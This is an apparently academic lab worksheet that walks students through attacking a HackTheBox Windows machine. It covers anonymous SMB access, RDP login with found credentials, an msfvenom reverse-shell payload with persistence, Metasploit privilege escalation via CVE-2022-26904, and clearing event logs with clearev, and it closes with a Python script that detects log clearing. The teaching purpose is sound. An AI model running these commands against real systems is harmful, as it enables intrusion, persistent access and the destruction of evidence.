P14 - Maintaining Access N Covering Tracks v7

The document outlines a workshop on the five phases of hacking: Reconnaissance, Scanning, Gaining Access, Maintaining Access, and Covering Tracks. It provides practical exercises using tools like MSFVENOM and SMB to gain and maintain access to a target system, as well as methods for covering tracks to avoid detection. The objective is to help students understand these phases to develop effective defensive strategies against cyber intrusions.


Cyber Security Attack & Defence

School of Information Technology

UNCONTROLLED COPY

P14 – Maintaining Access and Covering Tracks

Overview

A hacking attack can be divided broadly into FIVE phases: Reconnaissance,
Scanning, Gaining Access, Maintaining Access and Covering Tracks. The five phases
are not necessarily sequential. This workshop will summarize and cover the five
phases of the attack.

Objectives

The objective of this lab is to help students gain an understanding of the phases of
hacking in order to formulate an effective defensive strategy against intrusion.

Reference:

www.kali.org
www.nmap.org
www.metasploit.com

Page 1 of 5

PART A: Gaining Access

We will use the HackTheBox SuperProfile machine for this lab.

Let’s start off by checking out what ports are open on this target.

1. Record the ports you find that could be of interest:

2. Let’s check out one of the services: SMB

3. Run a command that you have learnt previously to list out the available shares anonymously.

Record down the command that would give you that information.

4. From what you have gathered from the shares, there is one that looks bare, at least to me.

5. Let’s go check it out.

Running smbclient -N //<IP Address>/<share> should get me inside. I think…

6. Okay, let’s just assume you got into the correct share by now. There you notice some kind of
user ID and password. Now download the file onto your Kali and check it out.

Record what’s found in the file.

7. There was one other interesting port that we found in Q1, one that allows remote desktop
connections. Let’s try it out with the credentials we found.

Running xfreerdp /u:<userid> /p:<password> /v:<IP Address> should do the job.


PART B: Maintaining Access

After gaining access to a system, it is a good idea to maintain access to the system so that the
compromised system can be used for further examination or even used as a pivot to attack other
machines in the network.

Alright, here we will summon our knowledge of our favorite tool: MSFVENOM.

1. But first, we need to answer a few critical questions about our target VM that we need in order
to create our MSFVENOM file:

Operating System
System Type (x86/x64)

2. Now that we have this information, I’m sure you can create your own MSFVENOM payload on your
Attacker machine.

Running msfvenom -p <operating system>/<type>/meterpreter/reverse_tcp LHOST=<VPN/tun0 IP> LPORT=4444 -f exe -o <whateverfilenameyouwant>.exe

note: there is no x86 input option; just leave <type> blank if for some reason you determine
that the victim is an x86 machine.

e.g. for x86 the payload name should look like this: windows/meterpreter/reverse_tcp

3. Find a way to upload/copy/paste/put the newly created <whateverfilenameyouwant>.exe onto
the victim machine.

4. Propose a suitable location on the victim where you can put this <whateverfilenameyouwant>.exe and
explain how it can be run each time the victim restarts the machine.

5. Now that we have settled all that, let’s get a listener working on the Attacker machine before
you execute the <whateverfilenameyouwant>.exe.

• msfconsole
• use exploit/multi/handler
• set payload <operating system>/<type>/meterpreter/reverse_tcp
• set LHOST tun0
• set LPORT 4444
• run

6. Now you can run the <whateverfilenameyouwant>.exe from the victim machine.

7. With some luck and maybe some expertise on your part, the victim should execute your
executable file every time the machine restarts or the user logs in. You can manually
trigger a restart on this HTB machine to see if it automatically executes and comes back to your
listener.


8. After some checking on the victim machine, you find out that the Windows 11 build is 21H2. With some
quick research on Windows 11 build 21H2, you find that this build is affected by CVE-2022-26904.

9. Without any hesitation or questions, you proceed with the following steps:

• on the existing meterpreter session: background
(take note of the session number that is sent to the background)
• use exploit/windows/local/cve_2022_26904_superprofile
• set payload windows/x64/meterpreter/reverse_tcp
• set LOGINUSER rbolton
• set LOGINPASSWORD <rbolton’s password>
• set SESSION <#>
(input the same session number that was sent to the background)
• set LHOST tun0
• set AutoCheck false
• run

10. Wait for the exploit to finish running.

11. Once you get a shell, type getuid and you should see that you are now running as the SYSTEM
account.

At this point, you have successfully escalated your privileges on the victim machine.

To complete this lab, you should continue with Part C now.


PART C: Covering Tracks

1. Event Viewer, a component of Microsoft's Windows NT line of operating systems, lets
administrators and users view the event logs on a local or remote machine. From the
attacker's perspective, it is best that the activities performed on a compromised
machine leave no trace in these logs. Log into the Target VM and check the Windows event log
using the Event Viewer.

2. Search for the Event Viewer on the victim machine → Select Windows Logs →
Application.

3. Here you can see a bunch of logs, including errors… that could raise some
suspicions… let’s just try to clear them so no one notices the errors.

4. Running clearev on an existing meterpreter session should do it.

Paste your output of the command below:

5. Go back to the victim’s Event Viewer; it is now blank. GGWP.

This is the end of the lab. However, do think about how empty event logs could
also raise suspicions from more experienced administrators.
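As an added defender's-side example (not part of the lab sheet), the script below shows why a cleared log is not a clean log: clearing the Security log leaves Security event ID 1102 behind, clearing the Application or System log leaves System event ID 104, and a log whose oldest surviving record is only minutes old on a long-running host is itself a signal. The event records and field names are constructed for this example.

```python
"""Detect event-log clearing from Windows event records (added example,
not part of the lab sheet). Records are constructed; field names are
assumptions for this example."""
from datetime import datetime, timedelta

# Constructed records mimicking what Windows writes when logs are cleared:
# Security ID 1102 (audit log cleared) and System ID 104 (a log was cleared).
SAMPLE_EVENTS = [
    {"time": "2024-02-20T10:00:00", "log": "Setup", "id": 1, "user": "SYSTEM"},
    {"time": "2024-03-01T09:07:00", "log": "Security", "id": 1102, "user": "SYSTEM"},
    {"time": "2024-03-01T09:07:01", "log": "System", "id": 104, "cleared": "Application"},
    {"time": "2024-03-01T09:07:01", "log": "System", "id": 104, "cleared": "System"},
    {"time": "2024-03-01T09:08:00", "log": "Application", "id": 1000, "user": "rbolton"},
    {"time": "2024-03-01T09:09:00", "log": "Security", "id": 4624, "user": "rbolton"},
]
EXPECTED_LOGS = ["Application", "Security", "System", "Setup"]

# (log, event ID) pairs that record a log being cleared.
CLEAR_EVENTS = {("Security", 1102), ("System", 104)}


def find_log_clears(events):
    """Return the records that say a log was cleared; clearev leaves these behind."""
    return [e for e in events if (e["log"], e["id"]) in CLEAR_EVENTS]


def find_short_history(events, expected_logs, now_iso, min_hours=24):
    """Flag logs that are empty or whose oldest record is younger than min_hours.

    A log that should span days but starts minutes ago is itself a signal.
    Returns {log: oldest record time as ISO string, or None if empty}.
    """
    now = datetime.fromisoformat(now_iso)
    oldest = {}
    for e in events:
        t = datetime.fromisoformat(e["time"])
        oldest[e["log"]] = min(t, oldest.get(e["log"], t))
    flagged = {}
    for log in expected_logs:
        first = oldest.get(log)
        if first is None or now - first < timedelta(hours=min_hours):
            flagged[log] = first.isoformat() if first else None
    return flagged


def assess(events, expected_logs, now_iso):
    """Combine both checks into one triage summary for the analyst."""
    return {"clears": find_log_clears(events),
            "short_history": find_short_history(events, expected_logs, now_iso)}
```

On a real host the same logic runs over records exported from Event Viewer or a SIEM; the Setup log is included only to show a log with normal history that is not flagged.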

~~ ** The End ** ~~

